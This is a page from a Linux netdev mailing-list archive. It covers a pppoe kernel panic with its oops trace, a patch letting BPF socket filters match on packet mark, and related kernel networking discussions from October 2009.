> > Commands sequence that i think triggered that:
> >
> > ip link set eth0 down
> > ip link set eth1 down
> > ip link set eth2 down
> > nameif etherx 00:16:76:8D:83:BA
> > nameif eth0 00:19:e0:72:4a:37
> > nameif eth1 00:19:e0:72:4a:4b
> >
> > ip addr flush dev eth0
> > ip addr flush dev eth1
> > ip addr add X.X.X.X/29 dev eth0
> > ip addr add 192.168.2.177/24 dev eth0
> > ip addr add 192.168.0.1/32 dev eth1
> > ip addr add 127.0.0.0/8 dev lo
> > #ip link set eth0 up
> > ip link set eth0 up
> > ip link set eth1 up
> > ip link set lo up
> > ip route add 0.0.0.0/0 via X.X.X.X
> >
> >
> > [ 103.428591] r8169: eth0: link up
> > [ 103.430360] r8169: eth1: link up
> > [ 113.361528] BUG: unable to handle kernel
> > NULL pointer dereference
> > at 0000018f
> > [ 113.361717] IP:
> > [<f8868269>] pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.361853] *pdpt = 000000003411a001
> > *pde = 0000000000000000
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362012] Oops: 0000 [#1]
> > SMP
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362166] last sysfs file: /sys/devices/virtual/vc/vcs3/dev
> > [ 113.362246] Modules linked in:
> > netconsole
> > configfs
> > act_skbedit
> > sch_ingress
> > sch_prio
> > cls_flow
> > cls_u32
> > em_meta
> > cls_basic
> > xt_dscp
> > xt_DSCP
> > ipt_REJECT
> > ts_bm
> > xt_string
> > xt_hl
> > ifb
> > cls_fw
> > sch_tbf
> > sch_htb
> > act_ipt
> > act_mirred
> > xt_MARK
> > pppoe
> > pppox
> > ppp_generic
> > slhc
> > xt_TCPMSS
> > xt_mark
> > xt_tcpudp
> > iptable_mangle
> > iptable_nat
> > nf_nat
> > rtc_cmos
> > nf_conntrack_ipv4
> > rtc_core
> > nf_conntrack
> > rtc_lib
> > nf_defrag_ipv4
> > iptable_filter
> > ip_tables
> > x_tables
> > 8021q
> > garp
> > stp
> > llc
> > loop
> > sata_sil
> > pata_atiixp
> > pata_acpi
> > ata_generic
> > libata
> > 8139cp
> > usb_storage
> > mtdblock
> > mtd_blkdevs
> > mtd
> > sr_mod
> > cdrom
> > tulip
> > r8169
> > sky2
> > via_velocity
> > via_rhine
> > sis900
> > ne2k_pci
> > 8390
> > skge
> > tg3
> > libphy
> > 8139too
> > e1000
> > e100
> > usbhid
> > ohci_hcd
> > uhci_hcd
> > ehci_hcd
> > usbcore
> > nls_base
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344]
> > [ 113.362344] Pid: 2858, comm: pppd Not tainted (2.6.31.4-build-0047 #7)
> > [ 113.362344] EIP: 0060:[<f8868269>] EFLAGS: 00010286 CPU: 0
> > [ 113.362344] EIP is at pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.362344] EAX: f4fbe000 EBX: ffffffff ECX: f6cea5a0 EDX: f7403680
> > [ 113.362344] ESI: 0000000f EDI: f6cea5e0 EBP: f4145e34 ESP: f4145e1c
> > [ 113.362344] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
> > [ 113.362344] Process pppd (pid: 2858, ti=f4145000 task=f4112ff0
> > task.ti=f4145000)
> > [ 113.362344] Stack:
> > [ 113.362344] f4fbe220
> > f4fbe000
> > f6cea5a0
> > f886a430
> > fffffff5
> > 00000000
> > f4145e54
> > c01422b3
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344] <0>
> > f4fbe000
> > 00000009
> > f8a457d8
> > f4fbe000
> > f8850190
> > 00001091
> > f4145e64
> > c0142361
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344] <0>
> > ffffffff
> > 00000000
> > f4145e74
> > c029ffbf
> > f4fbe000
> > 000010d0
> > f4145e90
> > c029fa70
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344] Call Trace:
> > [ 113.362344] [<c01422b3>] ? notifier_call_chain+0x2b/0x4a
> > [ 113.362344] [<c0142361>] ? raw_notifier_call_chain+0xc/0xe
> > [ 113.362344] [<c029ffbf>] ? dev_close+0x4c/0x8c
> > [ 113.362344] [<c029fa70>] ? dev_change_flags+0xa5/0x158
> > [ 113.362344] [<c02da633>] ? devinet_ioctl+0x21a/0x503
> > [ 113.362344] [<c02db693>] ? inet_ioctl+0x8d/0xa6
> > [ 113.362344] [<c0292b21>] ? sock_ioctl+0x1c8/0x1ec
> > [ 113.362344] [<c0292959>] ? sock_ioctl+0x0/0x1ec
> > [ 113.362344] [<c019af2b>] ? vfs_ioctl+0x22/0x69
> > [ 113.362344] [<c019b435>] ? do_vfs_ioctl+0x41f/0x459
> > [ 113.362344] [<c02934eb>] ? sys_send+0x18/0x1a
> > [ 113.362344] [<c011942f>] ? do_page_fault+0x242/0x26f
> > [ 113.362344] [<c019b49b>] ? sys_ioctl+0x2c/0x45
> > [ 113.362344] [<c0102975>] ? syscall_call+0x7/0xb
> > [ 113.362344] Code:
> > c9
> > 00
> > 00
> > 00
> > 89
> > c7
> > 31
> > f6
> > 83
> > c7
> > 40
> > 89
> > f8
> > e8
> > cc
> > 60
> > a9
> > c7
> > 8b
> > 45
> > ec
> > 05
> > 20
> > 02
> > 00
> > 00
> > 89
> > 45
> > e8
> > 8b
> > 4d
> > f0
> > 8b
> > 1c
> > b1
> > e9
> > 8c
> > 00
> > 00
> > 00
> > 8b
> > 45
> > ec
> > Oct 18 23:59:40 194.146.153.93
> > 83
> > 90
> > 01
> > 00
> > 00
> > 74
> > 08
> > 8b
> > 9b
> > 8c
> > 01
> > 00
> > 00
> > eb
> > 79
> > b8
> > c0
> > a6
> > 86
> > f8
> > Oct 18 23:59:40 194.146.153.93
> > [ 113.362344] EIP: [<f8868269>]
> > pppoe_device_event+0x80/0x12c [pppoe]
> > SS:ESP 0068:f4145e1c
> > [ 113.362344] CR2: 000000000000018f
> > [ 113.373124] ---[ end trace f6fe64a307e97f3b ]---
> > [ 113.373203] Kernel panic - not syncing: Fatal exception in interrupt
> > [ 113.373286] Pid: 2858, comm: pppd Tainted: G D
> > 2.6.31.4-build-0047 #7
> > [ 113.373379] Call Trace:
> > [ 113.373479] [<c02fc496>] ? printk+0xf/0x11
> > [ 113.373561] [<c02fc3e7>] panic+0x39/0xd9
> > [ 113.373656] [<c01059b7>] oops_end+0x8b/0x9a
> > [ 113.373727] [<c0118f6d>] no_context+0x13d/0x147
> > [ 113.373800] [<c011908a>] __bad_area_nosemaphore+0x113/0x11b
> > [ 113.373881] [<c02953b3>] ? sock_alloc_send_pskb+0x8b/0x24a
> > [ 113.373959] [<c0121801>] ? __wake_up_sync_key+0x3b/0x45
> > [ 113.374030] [<c0131967>] ? irq_exit+0x39/0x5c
> > [ 113.374107] [<c0104393>] ? do_IRQ+0x80/0x96
> > [ 113.374183] [<c0102f49>] ? common_interrupt+0x29/0x30
> > [ 113.374259] [<c011909f>] bad_area_nosemaphore+0xd/0x10
> > [ 113.374348] [<c0119301>] do_page_fault+0x114/0x26f
> > [ 113.374526] [<c01191ed>] ? do_page_fault+0x0/0x26f
> > [ 113.374605] [<c02fe506>] error_code+0x66/0x6c
> > [ 113.374683] [<c02d007b>] ? tcp_v4_send_ack+0xa3/0x10e
> > [ 113.374764] [<c01191ed>] ? do_page_fault+0x0/0x26f
> > [ 113.374850] [<f8868269>] ? pppoe_device_event+0x80/0x12c [pppoe]
> > [ 113.374928] [<c01422b3>] notifier_call_chain+0x2b/0x4a
> > [ 113.375012] [<c0142361>] raw_notifier_call_chain+0xc/0xe
> > [ 113.375097] [<c029ffbf>] dev_close+0x4c/0x8c
> > [ 113.375169] [<c029fa70>] dev_change_flags+0xa5/0x158
> > [ 113.375239] [<c02da633>] devinet_ioctl+0x21a/0x503
> > [ 113.375318] [<c02db693>] inet_ioctl+0x8d/0xa6
> > [ 113.375411] [<c0292b21>] sock_ioctl+0x1c8/0x1ec
> > [ 113.375491] [<c0292959>] ? sock_ioctl+0x0/0x1ec
> > [ 113.375574] [<c019af2b>] vfs_ioctl+0x22/0x69
> > [ 113.375653] [<c019b435>] do_vfs_ioctl+0x41f/0x459
> > [ 113.375734] [<c02934eb>] ? sys_send+0x18/0x1a
> > [ 113.375813] [<c011942f>] ? do_page_fault+0x242/0x26f
> > [ 113.375884] [<c019b49b>] sys_ioctl+0x2c/0x45
> > [ 113.375960] [<c0102975>] syscall_call+0x7/0xb
> > [ 113.376041] Rebooting in 5 seconds..
^ permalink raw reply
* Re: [PATCH][RFC]: ingress socket filter by mark
From: jamal @ 2009-10-19 12:12 UTC (permalink / raw)
To: Maciej Żenczykowski; +Cc: Eric Dumazet, netdev, David Miller, Atis Elsts
In-Reply-To: <55a4f86e0910181609o6b21d667g8e65638667a1d687@mail.gmail.com>
On Sun, 2009-10-18 at 16:09 -0700, Maciej Żenczykowski wrote:
>
> I agree that being able to filter on mark in bpf makes a lot of sense.
I agree as well - i posted a patch yesterday; i just tested it and it
works so i will formally post it shortly.
> I wonder if we're not hitting the filters potentially before the mark
> is set though (on receive at least)...
> I'm nowhere near sure but I think packets get diverted/cloned to
> tcpdump before they hit the ip stack (and thus potentially get marked
> by ip(6)table mangle rules)
There are many ways to mark the packets before they get to the socket.
tc ingress provides at least two ways (ipt action and recently posted
patch by me on skbedit); iptables as well.
cheers,
jamal
^ permalink raw reply
* Re: Kernel oops when clearing bgp neighbor info with TCP MD5SUM enabled
From: Oleg Nesterov @ 2009-10-19 12:13 UTC (permalink / raw)
To: Anirban Sinha; +Cc: linux-kernel, David Miller, netdev, Anirban Sinha
In-Reply-To: <4ADB7856.7000803@anirban.org>
Hi Anirban,
On 10/18, Anirban Sinha wrote:
>
> I have a question for you. The queue_work() routine which is called from
> schedule_work() does a put_cpu() which in turn does a enable_preempt(). Is
> this an attempt to trigger the scheduler?
No. please note that queue_work() does get_cpu() + put_cpu() to protect
against cpu_down() in between.
This can trigger the scheduler of course, but everything should be OK.
> One of the side affects of
> this enable_preempt() is the crash that we see below. What is happening
> is that a timer callback routine, in this case inet_twdr_hangman(),
> tries a bunch of cleanup until a threshold is reached. If further cleanups
> needs to be done beyond the threshold, it queues a work function. Now when
> the timer callback is run in __run_timers(), the routine grabs the value
> of preempt_count before and after the callback function call. If the two
> counts do not match, it calls BUG() (line 1037 in kernel/timer.c).
Yes, but I can't see how queue_work() can be involved, it doesn't change
->preempt_count. Note again it does put after get.
> Is is
> it illegal to schedule a work function from within a timer callback?
Yes sure.
I'd suppose that this unbalance comes from inet_twdr_hangman() pathes.
Could you verify this?
Oleg.
^ permalink raw reply
* [PATCH]: ingress socket filter by mark
From: jamal @ 2009-10-19 12:17 UTC (permalink / raw)
To: David Miller, netdev; +Cc: Eric Dumazet, Maciej Żenczykowski
[-- Attachment #1: Type: text/plain, Size: 70 bytes --]
apps can specify mark that they want to accept/reject.
cheers,
jamal
[-- Attachment #2: filt-sock-m-3 --]
[-- Type: text/plain, Size: 1099 bytes --]
commit ec187e3028db866161b881c5ac9eeea4e9bb0f1f
Author: Jamal Hadi Salim <hadi@cyberus.ca>
Date: Mon Oct 19 08:12:46 2009 -0400
[PATCH]: ingress socket filter by mark
Allow bpf to set a filter to drop packets that dont
match a specific mark
Signed-off-by: Jamal Hadi Salim <hadi@cyberus.ca>
diff --git a/include/linux/filter.h b/include/linux/filter.h
index 1354aaf..909193e 100644
--- a/include/linux/filter.h
+++ b/include/linux/filter.h
@@ -123,7 +123,8 @@ struct sock_fprog /* Required for SO_ATTACH_FILTER. */
#define SKF_AD_IFINDEX 8
#define SKF_AD_NLATTR 12
#define SKF_AD_NLATTR_NEST 16
-#define SKF_AD_MAX 20
+#define SKF_AD_MARK 20
+#define SKF_AD_MAX 24
#define SKF_NET_OFF (-0x100000)
#define SKF_LL_OFF (-0x200000)
diff --git a/net/core/filter.c b/net/core/filter.c
index d1d779c..e3987e1 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -303,6 +303,9 @@ load_b:
case SKF_AD_IFINDEX:
A = skb->dev->ifindex;
continue;
+ case SKF_AD_MARK:
+ A = skb->mark;
+ continue;
case SKF_AD_NLATTR: {
struct nlattr *nla;
^ permalink raw reply related
* Re: kernel panic in latest vanilla stable, while using nameif with "alive" pppoe interfaces
From: Eric Dumazet @ 2009-10-19 12:36 UTC (permalink / raw)
To: Michal Ostrowski; +Cc: Denys Fedoryschenko, netdev, linux-ppp, paulus, mostrows
In-Reply-To: <e6d1cecd0910182034t9d24859mc6f392875b36ad17@mail.gmail.com>
Michal Ostrowski a écrit :
> Here's my theory on this after an inital look...
>
> Looking at the oops report and disassembly of the actual module binary
> that caused the oops, one can deduce that:
>
> Execution was in pppoe_flush_dev(). %ebx contained the pointer "struct
> pppox_sock *po", which is what we faulted on, excuting "cmp %eax, 0x190(%ebx)".
> %ebx value was 0xffffffff (hence we got "NULL pointer dereference at 0x18f").
>
> At this point "i" (stored in %esi) is 15 (valid), meaning that we got a value
> of 0xffffffff in pn->hash_table[i].
>
>>From this I'd hypothesize that the combination of dev_put() and release_sock()
> may have allowed us to free "pn". At the bottom of the loop we alreayd
> recognize that since locks are dropped we're responsible for handling
> invalidation of objects, and perhaps that should be extended to "pn" as well.
> --
> Michal Ostrowski
> mostrows@gmail.com
>
>
Looking at this stuff, I do believe flush_lock protection is not
properly done.
At the end of pppoe_connect() for example we can find :
err_put:
if (po->pppoe_dev) {
dev_put(po->pppoe_dev);
po->pppoe_dev = NULL;
}
This is done without any protection, and can therefore clash with
pppoe_flush_dev() :
spin_lock(&flush_lock);
po->pppoe_dev = NULL; /* ppoe_dev can already be NULL before this point */
spin_unlock(&flush_lock);
dev_put(dev); /* oops */
^ permalink raw reply
* Re: [PATCH] myri10ge: improve port type reporting in ethtool output
From: Ben Hutchings @ 2009-10-19 13:03 UTC (permalink / raw)
To: Andrew Gallatin
Cc: Brice Goglin, David S. Miller, Linux Network Development list
In-Reply-To: <4ADC5CB8.4010801@myri.com>
On Mon, 2009-10-19 at 08:34 -0400, Andrew Gallatin wrote:
> Ben Hutchings wrote:
>
> > Lying about link modes is not an improvement.
>
> OK, so we're probably doing something wrong. I suspect we're not
> alone. At least we don't set SUPPORTED_TP for CX4, like I've
> seen some NICs do.
>
> Can somebody suggest how we can tell ethtool that
> the NIC supports 10Gb only (no autoneg down to 1Gb or lower)
> for copper (10Gbase-CX4)? How about for fiber (10Gbase-{S,L})R?
What's wrong with what you already do? Customers expect to see
something on the supported line?
Ben.
--
Ben Hutchings, Senior Software Engineer, Solarflare Communications
Not speaking for my employer; that's the marketing department's job.
They asked us to note that Solarflare product names are trademarked.
^ permalink raw reply
* Re: [PATCH] myri10ge: improve port type reporting in ethtool output
From: Andrew Gallatin @ 2009-10-19 12:34 UTC (permalink / raw)
To: Ben Hutchings
Cc: Brice Goglin, David S. Miller, Linux Network Development list
In-Reply-To: <1255939929.3916.13.camel@localhost>
Ben Hutchings wrote:
> Lying about link modes is not an improvement.
OK, so we're probably doing something wrong. I suspect we're not
alone. At least we don't set SUPPORTED_TP for CX4, like I've
seen some NICs do.
Can somebody suggest how we can tell ethtool that
the NIC supports 10Gb only (no autoneg down to 1Gb or lower)
for copper (10Gbase-CX4)? How about for fiber (10Gbase-{S,L})R?
Thanks,
Drew
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox